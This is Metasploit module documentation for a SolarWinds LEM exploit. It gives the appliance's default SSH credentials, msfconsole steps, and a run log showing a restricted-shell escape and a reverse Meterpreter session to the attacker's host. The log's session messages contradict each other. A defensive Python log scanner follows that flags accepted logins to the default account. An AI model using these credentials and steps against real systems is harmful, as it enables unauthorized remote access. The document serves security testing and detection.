GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md

Vulnerable Application

This module exploits the default credentials of SolarWinds LEM. When the SSH service is accessed with the default username and password, "cmc" and "password", a menu system is presented. By exploiting a vulnerability in the menu script, an attacker can escape from the restricted shell.

The vulnerable application can be downloaded as a free trial from the vendor's web page: http://www.solarwinds.com/log-event-manager

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/linux/ssh/solarwinds_lem_exec

  3. Do: set rhost <ip>

  4. Do: set lhost <ip>

  5. Do: exploit

  6. You should get a shell.

Scenarios

This is a run against a known vulnerable SolarWinds LEM server.

msf exploit(solarwind_lem_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(solarwind_lem_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: cmc
meterpreter >
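
A defender-side check for the access this module depends on, added here as an example that is not part of the Metasploit documentation: it scans SSH authentication log lines for logins accepted for the default "cmc" account from addresses outside an allow-list. The OpenSSH syslog format, the sample lines, and the names find_cmc_logins and ALLOWED_SOURCES are assumptions.

```python
import ipaddress
import re

# Assumption: the appliance's sshd writes standard OpenSSH syslog lines.
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<src>\S+) port (?P<port>\d+)"
)

# Assumption: hypothetical management network allowed to reach the CMC menu.
ALLOWED_SOURCES = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample log lines (not taken from a real appliance).
SAMPLE_LOG = """\
Mar 17 21:58:40 lem sshd[4121]: Failed password for root from 12.0.0.1 port 51514 ssh2
Mar 17 21:58:57 lem sshd[4130]: Accepted password for cmc from 12.0.0.1 port 51520 ssh2
Mar 17 22:10:02 lem sshd[4202]: Accepted password for cmc from 10.20.0.15 port 40022 ssh2
Mar 17 22:11:45 lem sshd[4210]: Accepted publickey for cmc from 12.0.0.9 port 40100 ssh2
Mar 17 22:12:00 lem sshd[4215]: Accepted password for cmc from not-an-ip port 1 ssh2
"""


def find_cmc_logins(log_text, account="cmc", allowed=ALLOWED_SOURCES):
    """Return (line_no, source, reason) for each suspicious accepted login."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = ACCEPTED.search(line)
        if not m or m["user"] != account:
            continue  # failed logins and other accounts are out of scope here
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            # sshd may log a hostname; report it rather than silently skipping
            findings.append((line_no, m["src"], "unparseable source"))
            continue
        if any(src in net for net in allowed):
            continue  # login from the approved management network
        reason = ("password login from unapproved source"
                  if m["method"] == "password"
                  else "login from unapproved source")
        findings.append((line_no, str(src), reason))
    return findings


if __name__ == "__main__":
    for finding in find_cmc_logins(SAMPLE_LOG):
        print(finding)
```

Any accepted password login for "cmc" shows the account is still reachable by password over SSH; changing the default password removes the condition the module relies on.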